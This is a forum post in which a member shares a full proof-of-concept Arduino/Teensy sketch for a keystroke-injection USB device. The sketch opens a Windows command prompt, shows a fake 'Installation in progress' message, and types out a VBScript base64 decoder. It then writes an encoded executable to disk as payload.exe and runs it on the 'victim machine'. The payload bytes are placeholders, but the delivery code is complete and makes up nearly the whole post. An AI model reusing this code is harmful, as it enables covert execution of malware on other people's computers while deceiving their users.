Jump to content

marked

Members
  • Posts

    1
  • Joined

  • Last visited

Everything posted by marked

  1. Hi all, I was working on the same topic, so I can share my Poc. I used the same encoding technique that you are talking about (base64 in vbs) and writing the payload and the vbs on the victim machine. Here is the code, works fine for me with an asm downloader of 1Ko (env. 3 sec. to execute the loop): #include <phukdlib.h> #include <avr/pgmspace.h> // // binary copy download and execute payload // // 25.05.2011 char vbsString[] = "echo Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject(\"Scripting.FileSystemObject\"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject(\"Microsoft.XMLDOM\"):Set EL = DM.createElement(\"tmp\"):EL.DataType = \"bin.base64\":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject(\"ADODB.Stream\"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub > script.vbs & cls" ; #include <avr/pgmspace.h> // put the encoded exe payload here prog_char string_0[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > pl.dat & cls"; prog_char string_1[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_2[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_3[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_4[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_5[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_6[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5m >> pl.dat & cls"; prog_char string_7[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_8[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_9[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_10[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_11[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_12[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_13[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_14[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_15[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_16[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_17[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_18[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_19[] PROGMEM = "echo AA== >> pl.dat"; // Then set up a table to refer to your strings. PROGMEM const char *string_table[] = { string_0, string_1, string_2, string_3, string_4, string_5, string_6, string_7, string_8, string_9, string_10, string_11, string_12, string_13, string_14, string_15, string_16, string_17, string_18, string_19}; char buffer[100]; void setup() { delay(20000); pinMode(11, OUTPUT); digitalWrite(11, HIGH); delay(50); sendWinKey () ; delay(500); Keyboard.println("cmd"); //"cmd /t:ab" //delay(500); //ShrinkCurWinMSWIN(); delay(500); Keyboard.print("msg "); sendAsterixKey (); Keyboard.println(Installation in progress... - Please Wait "); delay(50); sendVbs(); } void loop() { } void sendVbs () { Keyboard.println(vbsString); for (int i = 0; i < 20; i++) { strcpy_P(buffer, (char*)pgm_read_word(&(string_table[i]))); Keyboard.println(buffer); delay(50); } Keyboard.println("cscript script.vbs pl.dat payload.exe & cls"); Keyboard.println("payload.exe & cls"); // run payload Keyboard.println("exit"); // run payload } void sendPlusKey () { Keyboard.set_key1(KEYPAD_PLUS); Keyboard.send_now(); Keyboard.set_key1(0); // reset key state Keyboard.send_now(); } void sendAsterixKey () { Keyboard.set_key1(KEYPAD_ASTERIX); Keyboard.send_now(); Keyboard.set_key1(0); // reset key state Keyboard.send_now(); } void sendWinKey () { Keyboard.set_modifier(128); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } Any ideas are welcome. Cheers.
×
×
  • Create New...